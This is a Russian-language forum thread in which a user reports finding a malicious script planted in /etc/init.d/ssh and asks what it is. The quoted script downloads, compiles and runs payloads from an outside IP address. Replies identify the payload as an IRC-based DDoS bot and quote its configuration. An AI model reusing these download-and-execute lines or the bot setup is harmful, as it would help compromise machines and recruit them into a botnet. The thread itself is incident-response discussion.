Что делает этот бот

0

2

Сегодня наткнулся на скрипт, который как-то связан с irc ботом, нашли его в /etc/init.d/ssh, вот его содержимое:

wget http://205.237.100.170/manual/a.c -O /tmp/init.c;
gcc -o /tmp/init /tmp/init.c;
chmod +x /tmp/init;
/tmp/init;
rm -rf /tmp/init /tmp/init.c;

wget http://205.237.100.170/manual/pb -O /tmp/p;perl /tmp/p;rm -rf /tmp/p;

wget http://205.237.100.170/manual/b -O /tmp/b;chmod +x /tmp/b;/tmp/b;rm -rf /tmp/b;

располагается по адресу: http://stablehost.us/bots/regular.bot

собственно вопрос — что это, что следует сделать после нахождения оного.

Ссылка

←	Как ломали SilkRoad

Опасная уязвимость в GNU strings и других утилитах binutils

→

а где текст a.c?

zolden ★★★★★
(24.10.14 12:56:27 MSK)

Ссылка

Что угодно. В a.c есть хелп, ртфм. И да:

* SH <command> = Executes a command

Действительно что угодно.

~~entefeed~~ ☆☆☆
(24.10.14 13:01:14 MSK)

Ссылка

user@comp ~ $ head -n 2 a.c
/*******************************************************************************
 *   This is a IRC based distributed denial of service client.  It connects to *

anonymous
(24.10.14 13:04:57 MSK)

Ссылка

Вирос там скорее всего. Не кочай.

IPR ★★★★★
(24.10.14 13:08:04 MSK)

Ссылка

#define FAKENAME "init" // What you want this to hide as
#define CHAN "#int" // Channel to join
#define KEY "bleh"      // The key of the channel
char *servers[] = {     // List the servers in that format, always end in (void*)0
        "x.secureshellz.net

Алсо, можно туда сходить и виртуально набить виртуальное лицо ботовода.

~~entefeed~~ ☆☆☆
(24.10.14 13:11:08 MSK)

Ссылка

И как же машинку поимели?

imul ★★★★★
(24.10.14 19:40:28 MSK)

Ссылка

rm: невозможно сменить каталог с `/' на `lost+found': Permission denied 
rm: невозможно удалить `//var/lib/rpm/Requirename': Permission denied 
rm: невозможно удалить `//var/lib/rpm/Packages': Permission denied 
rm: невозможно удалить `//var/lib/rpm/Pubkeys': Permission denied 
rm: невозможно удалить `//var/lib/rpm/Basenames': Permission denied 
rm: невозможно удалить `//var/lib/rpm/Name': Permission denied

yoghurt ★★★★★
(24.10.14 19:43:19 MSK)